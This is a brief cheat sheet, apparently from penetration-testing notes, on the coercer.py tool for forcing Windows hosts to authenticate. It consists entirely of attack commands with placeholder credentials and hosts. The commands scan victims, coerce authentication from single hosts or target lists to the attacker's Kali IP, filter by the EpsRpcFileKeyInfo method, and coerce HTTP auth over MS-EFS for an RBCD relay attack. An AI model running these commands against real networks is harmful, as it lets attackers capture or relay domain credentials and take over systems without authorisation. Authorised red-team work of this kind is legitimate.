coercer.py
Coercer coerces things to talk to other things!
Scan a host to see if it can be leveraged to coerce authentication
coercer.py scan -u lowpriv -p 'pass123!' -t some.victim.host
Coerce auth from a victim to a system of your choice
coercer.py coerce -u 7ms -p 'pass' -t SOME.VICTIM.IP.ADDY -l LOCAL.KALI.IP.ADDY
Coerce using a text list of targets
coercer.py coerce -u 7ms -p 'pass' --targets-file list-of-victims.txt -l LOCAL.KALI.IP.ADDY
Coerce using a specific method name (that you cleaned from the SCAN mode)
This example uses EpsRpcFileKeyInfo
:
coercer.py coerce -u lowpriv -p 'password1' -t target.for.coercer.attack -l your.kali.ip.addy --filter-method-name EpsRpcFileKeyInfo
Coerce Web auth from a victim to pull off the RBCD attack
coercer.py coerce --auth-type http -l your.local.kali.ip -t ip.of.victim.machine -d domain.com -u lowpriv -p 'P@ssw0rd1' --filter-protocol-name MS-EFS
(More info about this in the ntlmrelay section)